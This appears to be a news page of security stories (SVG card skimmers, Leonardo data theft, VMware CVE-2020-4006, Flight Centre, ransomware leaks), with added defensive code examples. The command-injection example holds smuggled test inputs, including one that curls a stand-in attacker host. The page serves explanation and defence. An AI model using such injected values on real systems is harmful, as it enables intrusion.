More stories

  • Credit card stealer discovered in social media buttons

    Image via Iconfinder
    Cyber-criminals have created a new type of web malware that hides inside images used for social media sharing buttons in order to steal credit card information entered in payment forms on online stores.
    The malware, known as a web skimmer, or Magecart script, was spotted on online stores in June and September this year by Dutch security firm Sanguine Security (SangSec).
    While this particular form isn’t widely deployed, its discovery suggests that Magecart gangs are constantly evolving their bag of tricks.
    Steganography and malware attacks
    At the technical level, this particular script uses a technique known as steganography. Steganography refers to hiding information inside another format (i.e., text inside images, images inside videos, etc.).
    In the world of malware attacks, steganography is typically employed as a way to sneak malicious code past security scanners by placing the bad code inside seemingly innocent files.
    Over the past years, the most common form of steganography attacks has been to hide malicious payloads inside image files, usually stored in PNG or JPG formats.
    Malware gangs would add the malicious code inside the image, the image would be downloaded on a host system, extracted by another of the malware gang’s components, and then executed.

    In the world of web-based skimmers (Magecart scripts), steganography works because defenders and their scanners usually look for skimmers in JavaScript code, not inside image files.
    However, the technique has slowly been seeing some adoption among web skimmer gangs, with past steganographic attacks using site logos, product images, or favicons to hide payloads.
    Malicious code hidden in SVG images
    But as steganography use grew, security firms also started analyzing image files as a place where they could find irregularities or hidden web skimmer payloads.
    The interesting detail in these recent attacks is that the malicious code wasn’t hidden inside PNG or JPG files but in SVG files, an image format for vector-based graphics.
    Vector images describe graphics with coordinates and mathematical functions, and SVG is a text-based format rather than a binary one, which, in theory, should make hidden payloads easier to spot than in PNG or JPG files.
    However, SangSec says the threat actors were very clever when they designed their payload.
    “The malicious payload assumes the form of an HTML <svg> element, using the <path> element as a container for the payload. The payload itself is concealed utilizing syntax that strongly resembles correct use of the <svg> element,” SangSec said in a report last week.
    “While skimmers have added their malicious payload to benign files like images in the past, this is the first time that malicious code has been constructed as a perfectly valid image. The result is that security scanners can no longer find malware just by testing for valid syntax,” the company added.
    SangSec said it found malware gangs testing this technique in June, and on live e-commerce sites in September, with the malicious payload hidden inside social media sharing icons for sites like Google, Facebook, Twitter, Instagram, YouTube, and Pinterest.
    On infected stores, once users accessed the checkout page, a secondary component (called a decoder) would read the malicious code hidden inside the social sharing icons and then load a keylogger that recorded and exfiltrated card details entered in the payment form.
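    The report’s point is that a syntax check on the SVG no longer helps, because the carrier is a perfectly valid image. The scanner below is an added example written for this page, not SangSec’s tooling and not any skimmer’s code: it extracts every `<path d="…">`, applies the grammar check that the report says is insufficient, and then applies two statistical checks (coordinate count and the share of coordinates carrying three or more fractional digits) that do separate a hand-drawn social icon from a path used as a container. The thresholds, the sample icon and the carrier encoding are all assumptions; the carrier scheme is a hypothetical one built only to produce a test sample, not the scheme SangSec observed.

```javascript
// Added example, not SangSec's scanner or any skimmer's code. Thresholds are
// assumptions; tune them against the icon set a given store actually ships.
const PATH_TOKEN = /[MmLlHhVvCcSsQqTtAaZz]|-?(?:\d+\.\d*|\.\d+|\d+)(?:[eE][-+]?\d+)?/g;
const MAX_ICON_NUMBERS = 200;   // assumption: coordinates a 24x24 glyph should never need
const MAX_PRECISE_RATIO = 0.3;  // assumption: share of coordinates with 3+ fractional digits

function extractPathData(svgText) {
  const out = [];
  const re = /<path\b[^>]*?\sd\s*=\s*"([^"]*)"/gi;
  let m;
  while ((m = re.exec(svgText)) !== null) out.push(m[1]);
  return out;
}

function isValidPathData(d) {
  // Only command letters, numbers, whitespace and commas may appear, and the
  // data must open with a moveto. A carrier built to look like a path passes.
  const leftovers = d.replace(PATH_TOKEN, "").replace(/[\s,]/g, "");
  return leftovers.length === 0 && /^[\s,]*[Mm]/.test(d);
}

function pathStats(d) {
  const tokens = d.match(PATH_TOKEN) || [];
  const numbers = tokens.filter((t) => !/^[A-Za-z]$/.test(t));
  const precise = numbers.filter(
    (n) => (n.split(".")[1] || "").replace(/[eE].*$/, "").length >= 3
  );
  return {
    commands: tokens.length - numbers.length,
    numbers: numbers.length,
    preciseRatio: numbers.length ? precise.length / numbers.length : 0,
  };
}

function scanSvg(svgText) {
  return extractPathData(svgText).map((d, index) => {
    const stats = pathStats(d);
    const reasons = [];
    if (!isValidPathData(d)) reasons.push("invalid path grammar");
    if (stats.numbers > MAX_ICON_NUMBERS) reasons.push(`${stats.numbers} coordinates for one icon`);
    if (stats.preciseRatio > MAX_PRECISE_RATIO) reasons.push("most coordinates carry 3+ fractional digits");
    return { index, ...stats, suspicious: reasons.length > 0, reasons };
  });
}

// Constructed carrier (a hypothetical scheme, not the one SangSec observed):
// each byte rides as the three-digit fractional part of a plausible coordinate.
function hypotheticalCarrierPath(text) {
  let d = "M0 0";
  for (let i = 0; i < text.length; i++) {
    const byte = String(text.charCodeAt(i) & 0xff).padStart(3, "0");
    d += ` L${i % 24}.${byte} ${(i * 7) % 24}`;
  }
  return d + " Z";
}

// Constructed samples: a plain "layers" glyph, and the same icon slot carrying
// 120 bytes of filler (no skimmer code is embedded here).
const BENIGN_SVG =
  '<svg viewBox="0 0 24 24"><path d="M12 2L2 7l10 5 10-5-10-5zM2 17l10 5 10-5M2 12l10 5 10-5"/></svg>';
const CARRIER_SVG =
  `<svg viewBox="0 0 24 24"><path d="${hypotheticalCarrierPath("x".repeat(120))}"/></svg>`;

console.log(scanSvg(BENIGN_SVG));   // one path, suspicious: false
console.log(scanSvg(CARRIER_SVG));  // one path, valid grammar, suspicious: true
```

    Both samples pass `isValidPathData`; only the statistics flag the carrier. In practice a store owner gets more mileage from an integrity baseline (hash every shipped icon and alert on change) than from any heuristic, since the icons are static assets that should never change between deployments.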
    User protections
    End users have few options at their disposal when it comes to web skimmer attacks, as this type of code is usually invisible to them and extremely hard to detect, even for professionals.
    Furthermore, shoppers have no way to know how secure a site really is, or whether the store owner invests in security at all.
    The simplest way shoppers can protect themselves from web skimmer attacks is to use virtual cards designed for one-time payments.
    These cards are provided by some banks and payment apps, and they are currently the best way to deal with web-based skimming: even if attackers manage to record transaction details, the card data is useless because it was generated for one transaction only.

  • Italian police arrest suspects in Leonardo military, defense data theft

    Italian police have arrested a former employee of Leonardo SpA and another individual in connection to the theft of sensitive corporate and military information.

    The Naples Public Prosecutor’s Office said on November 5 that a prolonged cyberattack had been conducted against the Aerostructures and Aircraft Division of Leonardo SpA, one of the largest defense contractors worldwide.
    Headquartered in Rome, Italy, the company has over 49,000 employees and a presence in Italy, the UK, the US, and Poland across the aerospace, military, and security sectors.
    Last week, Italian law enforcement said the pair — one of which was an IT manager for Leonardo — were arrested for allegedly compromising the corporation’s network by executing malware able to quietly exfiltrate sensitive data. 
    According to the Naples office, the duo deployed malware dubbed cftmon.exe on 94 workstations, of which 33 were located at the company plant in Pomigliano D’Arco. The malware, described as a Trojan variant, was loaded through USB sticks plugged into the workstations and remained undetected from roughly May 2015 to January 2017. 
    In 2017, Leonardo’s cybersecurity team detected anomalous network traffic originating from these workstations and directed to a command-and-control (C2) server, fujinama.altervista.org. The web domain has since been seized by Italian police.

    The malware was able to silently exfiltrate classified and valuable corporate data, including military information, and maintained persistence by automatically executing on each workstation at startup.
    Originally, the defense contractor believed that the data exfiltration was a small and rather insignificant incident, but Italian law enforcement says a subsequent investigation revealed a “much more extensive and severe scenario.”
    Reconstructions of the incident performed by the police suggest that up to 10GB of data — or 100,000 files — was stolen during the campaign relating to security and defense strategy, HR, product distribution, and component design for civil and military aircraft, as well as employee credentials.
    Italian prosecutors have accused the pair of “abusive access to computer systems, unlawful interception of electronic communications, and [the] unlawful processing of personal data.”
    The head of Leonardo’s cybersecurity team has also been placed under house arrest for allegedly misleading and hindering investigative efforts concerning the cyberattack. 
    In a statement, Leonardo said that the arrests relate to an individual who is not an employee of the company, as well as a “non-executive” former member of staff. 
    “The company, which is obviously the injured party in this affair, has provided maximum cooperation since the beginning and will continue to do so to enable the investigators to clarify the incident, and for its own protection,” Leonardo added.

  • NSA warns of Russian state-sponsored hackers exploiting VMWare vulnerability

    Image: Tanguy Keryhuel, Mark Basarab, ZDNet
    The US National Security Agency has published a security alert today urging companies to update VMWare products for a vulnerability that is currently exploited by “Russian state-sponsored malicious cyber actors.”

    The vulnerability tracked as CVE-2020-4006, impacts VMWare endpoint and identity management products, often deployed in enterprise and government networks.
    The affected products, listed below, allow system administrators to manage large fleets of virtualized workstations, their authentication procedures, and the apps installed on each VM.
    VMware Workspace ONE Access (Access) 20.01 and 20.10 on Linux
    VMware Workspace ONE Access Connector (Access Connector)
    VMware Identity Manager (vIDM) 3.3.1, 3.3.2, and 3.3.3 on Linux
    VMware Identity Manager Connector (vIDM Connector) 3.3.1, 3.3.2, 3.3.3, 19.03
    VMware Cloud Foundation 4.x
    vRealize Suite Lifecycle Manager 8.x
    VMWare warned customers last month, on November 23, that these products contained a major security bug and published mitigations and workarounds to prevent attacks.
    On Friday, VMWare released official patches and credited NSA analysts for reporting the issue to its security team.
    The NSA has also issued its own security alert, urging government organizations to patch their VMWare products amid ongoing attacks from Russian hackers.
    “This advisory emphasizes the importance for National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) system administrators to apply vendor-provided patches to affected VMware identity management products,” the NSA said in a press release.
    How CVE-2020-4006 works

    At its core, CVE-2020-4006 is a basic “command injection” vulnerability that allows attackers to execute OS-level commands.
    The vulnerability is not extremely dangerous because it can only be exploited after an attacker has authenticated on a WorkspaceONE web-based dashboard.
    But if an attacker is in possession of valid credentials, the vulnerability can be used to take full control over any unpatched VMWare Workspace ONE system.
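    To make “command injection” concrete without reproducing the actual exploit, here is an added example written for this page, not VMware’s code and not the CVE-2020-4006 payload: the generic pattern in which an authenticated administrator’s input is spliced into a shell command line, beside the hardened form that validates the value and passes it as a single argument vector element so no shell ever parses it. The `hostname` setting, the `ping` command and the sample inputs are assumptions chosen for illustration.

```javascript
// Added example, not VMware's code and not the CVE-2020-4006 exploit.

// Vulnerable: the value is spliced into a shell command line. Anything after a
// shell metacharacter becomes a second command (or a command substitution) when
// this string reaches child_process.exec, which always spawns a shell.
function buildCommandVulnerable(hostname) {
  return `ping -c 1 ${hostname}`;
}

// Hardened: validate against the grammar the value must have (RFC 1123 host
// labels), then hand it to child_process.execFile as one argv element. No shell
// sees the string, and values that fail validation never reach execFile at all.
const HOSTNAME_RE =
  /^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$/i;

function buildInvocationHardened(hostname) {
  if (!HOSTNAME_RE.test(hostname)) {
    throw new Error(`rejected: ${JSON.stringify(hostname)} is not a hostname`);
  }
  return { file: "ping", args: ["-c", "1", hostname] };
}

// Characters a shell would interpret in the vulnerable string; the hardened path
// rejects any value containing them because a hostname cannot contain them.
function shellMetacharacters(value) {
  return value.match(/[;&|`$<>\n]/g) || [];
}

// Constructed inputs: one legitimate value and two injection attempts.
const INPUTS = ["idm.example.com", "idm.example.com; id", "$(curl attacker.example)"];

function compare(inputs) {
  return inputs.map((value) => {
    let hardened;
    try {
      hardened = buildInvocationHardened(value).args;
    } catch (e) {
      hardened = "rejected";
    }
    return {
      value,
      vulnerableCommandLine: buildCommandVulnerable(value),
      metacharacters: shellMetacharacters(value).length,
      hardened,
    };
  });
}

console.log(compare(INPUTS));
```

    The validation regex, not escaping, is what carries the weight here: escaping for one shell still leaves the string to be re-parsed by whatever the command itself hands it to, whereas an allowlisted grammar plus `execFile` removes the shell from the path entirely.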

    Image: NSA
    The VMWare Workspace ONE web-based dashboard is typically used by system administrators to manage the settings of their virtualized workstations.
    In most cases, the dashboard is available only via internal networks, but the dashboard can also be hosted over the internet in case administrators need to access their enterprise management tools from home, or if they need to manage networks in remote work points.
    Many system administrators might play down this vulnerability because attackers first need access to valid Workspace ONE credentials, and then they need access to the web dashboard itself, which in some cases might be available only on internal networks (intranets).
    However, things are never this simple.
    “An attacker can achieve these prerequisites by using varieties of methods such as gathering credentials via Phishing, purchasing credentials from third-party sites, or by brute forcing credentials,” Mark Arena, CEO of cyber-security firm Intel 471, told ZDNet.
    “Intel 471 considers this a medium risk issue due to the possibility of arbitrary command execution on the underlying operating systems with unrestricted privileges offset by the required authentication and adjacent network access,” Arena added.
    Russian hackers planting web shells, pivoting to other systems
    But despite these requirements, the NSA said it is aware of instances where Russian state-sponsored hackers have managed to obtain credentials for the VMWare Workspace ONE web panel and have integrated this bug into their attacks and used it to pivot laterally inside networks and escalate the access they had to a hacked organization.
    According to the NSA, in the attacks it was aware of, the hackers installed a web shell on the VMWare Workspace ONE system and then generated SAML credentials for themselves.
    The hackers then used the SAML credentials to access and steal sensitive data from the victim company’s Microsoft ADFS (Active Directory Federation Services) servers.
    The NSA did not name which of the many Russian state-sponsored groups has been abusing this VMWare bug but warned organizations not to take CVE-2020-4006 lightly.
    “NSA strongly recommends that NSS, DoD, and DIB system administrators apply the vendor-issued patch as soon as possible,” the agency said.
    Contacted for comment, VMWare also urged customers to apply the patches released on Friday.

    Image: NSA

  • OAIC finds Flight Centre breached privacy of almost 7,000 customers in 2017

    The Australian Information Commissioner and Privacy Commissioner Angelene Falk has handed down a determination that Flight Centre breached the privacy of 6,918 customers when it held its “design jam” event across the weekend of March 24 to March 26 in 2017.
    On the first day of the event, Flight Centre handed a data set containing production data from the 2015 and 2016 calendar years to the 16 teams competing in the event, which consisted of 90 people in total.
    The data set had 106 million rows of data, with the company believing it had obfuscated personal information of its customers, leaving only the customer’s year of birth, postcode, gender, and booking information. In the determination made by Falk, Flight Centre had its business intelligence and Australian infosec teams, as well as event coordinators review the first 1,000 rows of data to confirm there was no sensitive information in the file.
    However, 36 hours after the event had begun, a free text field under a column called “ProductName” was found by one of the participants to contain credit card information.
    Flight Centre then reviewed the file and found it contained 4,011 credit cards and 5,092 passport numbers affecting 6,918 people, as well as 475 usernames and passwords to mostly vendor portals. 757 dates of birth were also identified.
    Upon learning of the breach, the company prevented access to the file and truncated the column to 10 characters, received verbal confirmation from participants that they had destroyed all copies of the file, and began a post-incident review. Those who had their payment or passport details breached were notified by the company, offered free identity theft and credit monitoring coverage for a year, and Flight Centre coughed up for the cost of replacing passports when customers opted for it.
    Falk said that Flight Centre determined it was a low-risk incident because it involved no intrusion, the incident was not malicious, a known number of third parties had access to data, and there was no evidence of misuse.

    The heart of the breach was that Flight Centre had no technical controls to prevent travel consultants from entering passport information and credit card details into a free text field, relying instead on compliance with company policy, Falk wrote.
    “The absence of technical controls to prevent or detect such incorrect storage caused an inherent data security risk in terms of how this kind of personal information was protected by the respondent immediately prior to the data breach,” Falk said.
    At the time of the incident, Flight Centre had the ability to detect inappropriate storage of credit card information in some of its systems, but not its quoting, invoicing, or receipting systems. The company now scans on a weekly basis for the storage of payment and passport information in free text fields.
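    The control the determination describes (a scan for card and passport data sitting in free text fields) is straightforward to build, and the reason a review of the first 1,000 rows missed the problem is that the offending values were scattered through 106 million rows. The code below is an added example written for this page, not Flight Centre’s tooling: it walks every row of a named free text column, flags digit runs that pass the Luhn check as card numbers (masked in the output so the scan itself does not become another store of cardholder data), and flags passport-like tokens. The passport pattern, the column name and the sample rows are constructed; the card number used is the well-known non-issued test PAN.

```javascript
// Added example, not Flight Centre's scanner. Sample rows are constructed.
function luhnValid(digits) {
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

function maskPan(digits) {
  return digits.slice(0, 6) + "*".repeat(digits.length - 10) + digits.slice(-4);
}

// 13-19 digit runs, allowing the spaces or dashes people type between groups.
// Only Luhn-valid runs are reported, which filters out booking references.
function findCardNumbers(text) {
  const hits = [];
  const re = /(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    const digits = m[0].replace(/[ -]/g, "");
    if (digits.length >= 13 && digits.length <= 19 && luhnValid(digits)) hits.push(maskPan(digits));
  }
  return hits;
}

// Passport numbers have no universal format; this pattern (an assumption) takes
// one or two letters followed by seven digits, and only when the row mentions a
// passport, to keep the false-positive rate down on airline-style references.
function findPassportNumbers(text) {
  if (!/passport/i.test(text)) return [];
  return text.match(/\b[A-Z]{1,2}\d{7}\b/g) || [];
}

// Scan the whole column, not a sample: the hits in a large data set are sparse.
function scanFreeTextColumn(rows, column) {
  const findings = [];
  rows.forEach((row, index) => {
    const text = String(row[column] ?? "");
    const cards = findCardNumbers(text);
    const passports = findPassportNumbers(text);
    if (cards.length || passports.length) findings.push({ row: index, cards, passports });
  });
  return findings;
}

// Constructed rows. 4111 1111 1111 1111 is the standard non-issued test number;
// the passport value is made up; the 13-digit reference is not Luhn-valid.
const SAMPLE_ROWS = [
  { ProductName: "Flight SYD-LAX economy" },
  { ProductName: "Hotel 3 nights, pay w/ card 4111 1111 1111 1111 exp 03/19" },
  { ProductName: "Cruise deposit, passport N1234567 sent to operator" },
  { ProductName: "Tour booking ref 1234567890123" },
];

console.log(scanFreeTextColumn(SAMPLE_ROWS, "ProductName"));
```

    Running this over the export before it leaves the building is the preventive control; running it weekly over the quoting, invoicing and receipting systems, as the company now does, is the detective one. Both matter because the same free text field keeps accepting the same input until a technical control stops it.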
    Falk also criticised the company for handing over such a large data set in the first event it had run, and not requiring participants to sign an agreement.
    “This determination is a strong reminder for organisations to build privacy by design into new projects involving personal information handling, particularly where large datasets will be shared with third-party suppliers for analysis,” Falk said on Monday.
    “Organisations should assume that human errors — such as the inadvertent disclosure of personal information to suppliers — could occur and take steps to prevent them.
    “They should also carry out privacy impact assessments for data projects to assist in identifying and addressing all relevant privacy impacts.”
    Because the company reacted swiftly, notified individuals before the Notifiable Data Breaches scheme came into force, offered those impacted a number of services, paid for dark web monitoring to see if the details were misused, and dealt candidly with her office, Falk said it was not appropriate to take further action beyond a declaration that Flight Centre must not repeat the conduct.

  • Hackers leak data from Embraer, world's third-largest airplane maker

    Image via Embraer
    Brazilian company Embraer, considered today’s third-largest airplane maker after Boeing and Airbus, was the victim of a ransomware attack last month.
    Today, hackers involved in the intrusion have leaked some of the company’s private files as revenge after the airplane maker refused to negotiate and instead chose to restore systems from backups without paying their ransom demand.
    The Embraer files were shared on a website hosted on the dark web, managed by the RansomExx (also known as Defray777) ransomware gang.
    Data uploaded on this site included samples of employee details, business contracts, photos of flight simulations, and source code, among others, according to samples reviewed by ZDNet.

    Image: ZDNet
    Today’s leak confirms that hackers managed to steal data from the company’s servers. Embraer issued a press release last week admitting to a security breach, but did not confirm that the incident involved ransomware or data theft.
    The airplane maker said the attackers had “access to only a single environment,” and that the incident caused only a temporary impact on “some of its operations.”
    An Embraer spokesperson did not return a request for comment sent by ZDNet today, following the leak.
    RansomExx gets a “leak site”

    Embraer is also one of three companies that had their data leaked over the weekend on the RansomExx leak site, launched on Saturday.
    The RansomExx gang now joins a long list of ransomware gangs that run leak sites.
    Ransomware gangs use leak sites to put pressure on victims. During negotiations, companies are told that if they don’t pay the ransom demand, the attackers will leak data online as a form of punishment, so it can be downloaded by competitors, or so that the companies face regulatory penalties in their countries.

  • Cyber attacks on COVID-19 vaccine production are not quite a war crime

    Image: Emin Baycan
    As the fight against the coronavirus pandemic has progressed through the research phases to the production of working vaccines against COVID-19, the cyber attacks have followed.
    These attacks are nothing new, but they’ve changed focus.
    In March and April there were attacks on the US Department of Health and Human Services, attacks on one of Czechia’s biggest COVID-19 testing laboratories, and attacks on the World Health Organization and, it seems, Chinese government agencies too.
    The Vietnamese government-linked hacking group Ocean Lotus targeted officials in Wuhan, where the virus was first recorded, and the Chinese Ministry of Emergency Management.
    Australia and the US, as well as other nations, spoke out against such attacks.
    “As Australians and the international community band together to respond to COVID-19, we are concerned that malicious cyber actors are seeking to exploit the pandemic for their own gain,” Australia’s Ambassador for Cyber Affairs, Dr Tobias Feakin told ZDNet in April.
    “History will judge harshly those exploiting this crisis for their own objectives.”

    But more recently we’ve seen phishing attacks on the vaccine cold chain, the temperature-controlled environment needed to transport and store the vaccine, as well as tax and customs officials, and the manufacturers of cold chain equipment.
    All in all, companies in Germany, Italy, South Korea, Czechia, greater Europe, and Taiwan were targeted in that one campaign.
    Three state-sponsored hacker groups from Russia and North Korea have targeted seven COVID-19 vaccine makers. China and Iran have also been accused of attacks.
    Johnson & Johnson’s CISO said healthcare organisations are seeing cyber attacks from nation-state threat actors “every single minute of every single day”.
    Shouldn’t all this be illegal? Well yes, of course the hacking is illegal. But shouldn’t this disruption of medical supplies during a pandemic be a more serious crime? Yes, and in some circumstances, it would be. But not all.
    ‘It’s against the Geneva Convention!’
    The Fourth Geneva Convention, or in full the “Convention (IV) relative to the Protection of Civilian Persons in Time of War, Geneva, 12 August 1949”, is very clear on this sort of thing.
    “Civilian hospitals organized to give care to the wounded and sick, the infirm and maternity cases, may in no circumstances be the object of attack, but shall at all times be respected and protected by the Parties to the conflict,” it says in Article 18.
    “States which are Parties to a conflict shall provide all civilian hospitals with certificates showing that they are civilian hospitals and that the buildings which they occupy are not used for any purpose which would deprive these hospitals of protection.”
    Article 20 goes on to say that “personnel engaged in the search for, removal and transporting of and caring for wounded and sick civilians, the infirm and maternity cases, shall be respected and protected”.
    Skipping ahead to Article 23 — the ones in between are about transporting the wounded and sick by land, sea, and air — we get to the protection of medical supply lines.
    “Each High Contracting Party [state which is a party to the convention] shall allow the free passage of all consignments of medical and hospital stores and objects necessary for religious worship intended only for civilians of another High Contracting Party, even if the latter is its adversary,” it says.
    “It shall likewise permit the free passage of all consignments of essential foodstuffs, clothing and tonics intended for children under fifteen, expectant mothers and maternity cases.”
    There are some limits to all of these rules, of course.
    One example is that a nation at war can’t just import medical supplies via its enemy to avoid producing them itself, thereby releasing some of its own production capacity for the war effort.
    Another is that things like hospitals have to be used solely as hospitals, not “to commit, outside their humanitarian duties, acts harmful to the enemy”. That’s in Article 19.
    Minor additions have also been made since 1949, to extend and clarify the protections.
    The overall message is therefore clear: Civilian hospitals and medical facilities, their staff, and their medical supply lines, are all off-limits.
    The first and second Geneva Conventions relate to the treatment of wounded and sick combatants on land and sea, respectively. The third relates to the treatment of prisoners of war. Again the message is clear: Once combatants are injured or sick or captured, and out of the game, their medical care is not fair game.
    For fans of Hogan’s Heroes, “the Geneva Convention” they refer to in that WW2 sitcom is the predecessor of the 1949 convention, the much less-comprehensive “Convention relative to the Treatment of Prisoners of War” of 1929.
    Need more convincing? Check out the Customary International Humanitarian Law Database. It lists not just the international treaties but also the relevant national laws and military operations manuals.
    ‘But we’re not at war!’
    The thing is, though, the Geneva Conventions and all these other rules only apply during armed conflict. No war? No Geneva Conventions.
    So what about in peacetime?
    In a 2015 report [PDF], the snappily-named United Nations Group of Governmental Experts on Developments in the Field of Information and Telecommunications in the Context of International Security (GGE) agreed to 11 norms of responsible state behaviour in cyberspace.
    One norm requires states to “guarantee full respect for human rights”, but with a tag that says this includes “the right to freedom of expression”, it’s clear that this is about interfering with the use of the internet itself.
    Another norm bans states from conducting or supporting any act which “intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public”.
    But do medical research facilities count as critical infrastructure? Australia certainly thinks so.
    In an official commentary [PDF] on current UN negotiations dated April 16, 2020, Australia noted “with concern” the reports of cyber attacks on critical infrastructure “including healthcare/medical services, facilities and systems, and crisis response organisations”.
    “During a pandemic, it is hard to think of an infrastructure more critical than hospitals and health services,” Australia’s cyber negotiator at the UN Johanna Weaver told ZDNet.
    Australia’s Critical Infrastructure Centre, part of the Department of Home Affairs, also classifies the health system as critical infrastructure.
    Indeed, in March this year a parallel organisation to the GGE, the equally snappily-named UN Open Ended Working Group in the field of information and telecommunications in the context of international security (OEWG), indicated that this belief would be made more formal.
    The initial “pre-draft” of its report [PDF] says that “states should not conduct ICT operations intended to disrupt the infrastructure essential to political processes or harm medical facilities”.
    A joint proposal [.docx] from Australia, Czechia, Estonia, Japan, Kazakhstan, and the US aims to sharpen that, adding the words: “the OEWG underscored that all states considered medical services and medical facilities to be critical infrastructure for the purposes of [the] norms”.
    More broadly, an analysis in March this year by legal advisers from the International Committee of the Red Cross noted that “international law prohibits all states from intervening in the internal affairs of other states”.
    “The UK, for example, has expressly stated that this prohibition may also cover acts such as the ‘targeting of essential medical services’,” they wrote.
    They also noted that attacks on computer systems essential for the maintenance of public health and safety are banned by the 2001 Budapest Cybercrime Convention, to which 65 nations are signatories.
    In the view of most nations, therefore, this latest round of cyber attacks is, or at the very least should be, against international law.
    But so what?
    If we were at war, charges of committing war crimes could eventually end up being prosecuted in The Hague. But we’re not at war. And in peacetime, the 11 norms are constantly being breached.
    Some states don’t just permit the misuse of networks in their territories, they actively encourage it. Some states suppress free speech online. Some states actively disrupt the critical infrastructure of others.
    And of course, these cyber attacks on vaccine logistics are happening right now.
    So far all we’ve seen happen with such illegal conduct is coordinated diplomatic action. Perhaps during a pandemic, it’s time to put a bit of stick about.


  • Kazakhstan government is intercepting HTTPS traffic in its capital

    Image: flag of the Republic of Kazakhstan against the skyline of the capital, Nur-Sultan (Getty Images/iStockphoto)
    Under the guise of a “cybersecurity exercise,” the Kazakhstan government is forcing citizens in its capital of Nur-Sultan (formerly Astana) to install a digital certificate on their devices if they want to access foreign internet services.
    Once installed, the certificate would allow the government to intercept all HTTPS traffic made from users’ devices via a technique called MitM (Man-in-the-Middle).
    Starting today, December 6, 2020, Kazakh internet service providers (ISPs) such as Beeline, Tele2, and Kcell are redirecting Nur-Sultan-based users to web pages showing instructions on how to install the government’s certificate. Earlier this morning, Nur-Sultan residents also received SMS messages informing them of the new rules.

    Image supplied
    Currently, Kazakhstan users are reporting issues accessing sites like Twitter, YouTube, and Netflix unless they install the government’s root certificate.
    This is the Kazakh government’s third attempt at forcing citizens to install root certificates on their devices after a first attempt in December 2015 and a second attempt in July 2019.
    Both previous attempts failed after browser makers blacklisted the government’s certificates.
    Government calls it a cybersecurity training exercise
    In a statement published on Friday, Kazakh officials described their efforts to intercept HTTPS traffic as a cybersecurity training exercise for government agencies, telecoms, and private companies.

    They cited the fact that cyberattacks targeting “Kazakhstan’s segment of the internet” grew 2.7 times during the current COVID-19 pandemic as the primary reason for launching the exercise.
    Officials did not say how long the training exercise will last.
    The Kazakh government used a similarly vague statement last year, in 2019, describing its actions as a “security measure to protect citizens.”
    2019 interception efforts targeted social media sites
    The government’s 2019 HTTPS interception effort targeted 37 domains, all social media and communications websites, such as domains for Facebook, Google, Twitter, Instagram, YouTube, and VK, along with a few smaller sites.
    The 2015 attempt targeted all internet traffic for interception, which immediately drew the ire of foreign governments, financial institutions, and telecoms — all of which threatened the Kazakh government with lawsuits for having sensitive traffic and private information intercepted.
    Representatives for major browser makers, pivotal in blocking the Kazakh government’s first two attempts to backdoor HTTPS traffic, couldn’t be immediately reached for comment over the weekend, but, as before, they’re expected to block this certificate as well.

  • Ransomware hits helicopter maker Kopter

    Image: Kopter
    Helicopter maker Kopter has fallen victim to a ransomware attack after hackers breached its internal network and encrypted the company’s files.
    After Kopter refused to engage with the hackers, the ransomware gang has published on Friday some of the company’s files on the internet.
    Many ransomware groups upload and share victim data on special “leak sites” as part of their tactics to put pressure on the hacked companies to either have them come to the negotiation table or force them into paying huge ransom demands.
    LockBit ransomware gang takes credit
    The Kopter data has been published on a blog hosted on the dark web and operated by the LockBit ransomware gang. Files shared on this site include business documents, internal projects, and various aerospace and defense industry standards.

    Image: ZDNet
    In an email, the operators of the LockBit ransomware told ZDNet that they breached Kopter’s network last week by exploiting a VPN appliance that used a weak password and did not have two-factor authentication (2FA) enabled.
    The LockBit gang also said they operate a web portal on the dark web where they show details to hacked companies about the attack, including a ransom demand. LockBit operators said someone from Kopter accessed the ransom page, but the company did not engage with them in a chat window provided to hacked companies.
    Kopter has not publicly disclosed a security breach on its website or via business wires.

    A Kopter spokesperson did not return an email seeking comment on the ransomware attack. Phone calls made on Friday also remained unanswered.
    The Switzerland-based company was founded in 2007 and is known for its line of small and medium-class civilian helicopters.
    In January 2020, Italian aerospace and defense company Leonardo acquired Kopter for an undisclosed sum.